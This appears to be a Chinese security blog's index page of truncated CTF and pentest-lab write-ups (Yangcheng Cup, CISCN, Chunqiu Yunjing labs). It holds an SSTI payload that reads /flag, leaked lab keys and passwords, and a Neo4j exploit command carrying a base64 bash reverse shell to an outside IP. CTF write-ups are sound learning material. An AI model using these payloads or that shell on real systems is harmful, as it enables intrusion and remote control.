A day in AsaL1n

2024羊城杯 web这次比赛 在大家的努力下 我们A1natas最后排名第三 我也是成功的在晚上12点左右 侥幸ak了web 这次比赛被我非预期了好几题 笑死 Lyrics For You存在任意文件读取 可以读取config.key config.py等等 key的值是 1secret_code = "EnjoyThePlayTime123456" 存在pickle反序列化 直接伪造cookies就行 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768import osimport randomfrom flask import Flask, make_response, request, render_template# from cookie import set_cookie, cookie_check, get_cookieimport p ...

2024 巅峰极客初赛 web 感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见 EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了 GoldenHornKing贴一下payload 1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()}) 源代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...

beetl 模板注入学习依赖测试使用的依赖 12345678910<dependency> <groupId>com.ibeetl</groupId> <artifactId>beetl</artifactId> <version>3.0.11.RELEASE</version></dependency><dependency> <groupId>org.antlr</groupId> <artifactId>antlr4-runtime</artifactId> <version>4.7.2</version>//需要的引擎</dependency> 语法 主要还是参考官方文档 Beetl: Beetl3.0,模板引擎。从2010年开始研发开源 (gitee.com) 注意到这个 任意方法调用写一个demo看看是怎么阻止恶意方法调用的 12345678 ...

Prain清雨博客v1.3.0审计 某比赛里面出现的一道题目 赛时都花时间在做渗透上面了 今天抽出点时间来看看 路由 这个是一个极度轻量化的博客框架 所有的路由控制都在index.php这一个文件里面 首先调用他定义的get方法 这里我们访问的是/目录 为空 默认为index 使用$_SERVER[‘REQUEST_URI’]获取访问的路由 一系列的匹配之后 返回了XDEBUG_SESSION_START=18778这个值 后面就是一系列包含文件 检验安装的操作 然后进到switch里面 查询是否有匹配的路由 存在则反感会页面 否则返还404 比如index 访问/?index 这里显然不存在这个文件 返回空 后台插件rce漏洞该漏洞需要登录 漏洞点出现在?import路由 这个是一个上传主题的地方 这个博客允许上传自定义主题 123456789101112131415if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 's ...

2024 n00bzctf web wp 最近回到家里 煞笔浙江40多度 不想出门 看了好几天春秋杯的那个mycms 没啥思路 想摆了（划掉） 逛网站 在CTF赛事中心 - Bugku CTF 发现了这个比赛 上来玩玩 题目不是很难 一个小时就ak了。。。水点博客 Passwordless代码 1234567891011121314151617181920212223242526272829303132#!/usr/bin/env python3from flask import Flask, request, redirect, render_template, render_template_stringimport subprocessimport urllibimport uuidglobal leetapp = Flask(__name__)flag = open('/flag.txt').read()leet=uuid.UUID('13371337-1337-1337-1337-133713371337')@app.rou ...

从ciscn2024 sanic和DASCTF2024 Sanic’s revenge 学sanic原型链污染 四川回来 给机房带来了久违的流感 ciscn2024 sanic访问/src给出源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=[&# ...

2024 ciscn 决赛 记录+部分wp 第一次国赛决赛 还是很激动的一次比赛 感谢A1natas的小伙伴给予我的帮助 最后混了一个二等奖 day0从杭州萧山飞到成都 四川话听起来还是巴适 这里我就不得不吐槽某一个队员的方言了 比赛举办在四川大学 酒吧舞就是不一样啊 学校看起来就是牛逼 场地在体育馆（怎么又是体育馆 想起来某一次比赛的经历了 说的就是华东南） 开了空调 这空调嘎嘎得劲 回去就吹感冒了 成都是真的不夜城 晚上11点了还是灯火通明 晚上吃了顿火锅（都来四川了不试试？）我草好辣（已老实求放过） 晚上才看到要配置相关可信计算的环境（主办方现在才发 也是厉害的）环境配置到凌晨两点多 第二天起来感觉要寄了 day1第一天是可信计算+awdp 做了点web 然后看边上的大哥对着计算无能狂怒 awdp 绝对是防守修复放在第一位的 防守check过了之后 每一次都可以继续得分 ezjs fix不许上传ejs文件 但是应该是可以存在rce的 直接加上一个对ejs文件的文件内部文件过滤 随便过滤点就成功修了 break攻击的话 有很多的思路 赛后发现可以是往 n ...

春秋云镜-ThermalPower外网使用nmap扫描所给的web服务 访问8080 使用dirsearch扫描泄露文件 确定是heapdump泄露 下载泄露文件 分析得到shirokey 1algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES shiro attack一把梭 得到flag1 弹shell出来 搭建代理 走代理的扫描有点问题 还是上传之后扫描 172.22.17.6:21存在一个ftp服务 可以匿名登录 1proxychains ftp 172.22.17.6 连接很不稳定 直接使用浏览器访问 在SCADA 得到一个用户密码 123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3 fscan扫描 查看 注意到有一个内部员工通讯录和一个火创能源内部通知 注意到初始账号密码格式 scada工程师只有这些 也就是这些密码 12345678910chenhua/chenhua@0813zh ...

感觉已经国赛已经寄了 四川旅游计划 启动 春秋云镜-Tsclient外网先扫描端口 尝试爆破mssql的账号密码 得到密码为1qaz!QAZ 成功登录mssql 激活xpcmdshell 成功执行命令 msf生成shell 反弹到自己的vps上面来 使用msf自动提权 得到第一个flag 搭建隧道 把流量传出来 扫描内网 1234567891011121314151617181920212223[*] 172.22.8.31 XIAORANG\WIN19-CLIENT [*] 172.22.8.15 [+]DC XIAORANG\DC01 [*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows ServerNetInfo:[*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b ...

春秋云镜-Time外网 nmap扫描端口 只扫描出来22端口 令我很是疑惑 用goby进行信息收集 注意到开启了7474端口 直接访问 存在Neo4j shell 漏洞 CVE-2021-34371 脚本一把梭 1java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.98.127.126:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI5LjIwMi4xNjQvMzIzMiAwPiYx}|{base64,-d}|{bash,-i}" 成功反弹shell 在tmp目录下上传fscan 查看当前网段 12当前内网IP 172.22.6.36./fscan -h 177.22.6.36/16 >> out.txt 找到以下主机 123[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2 ...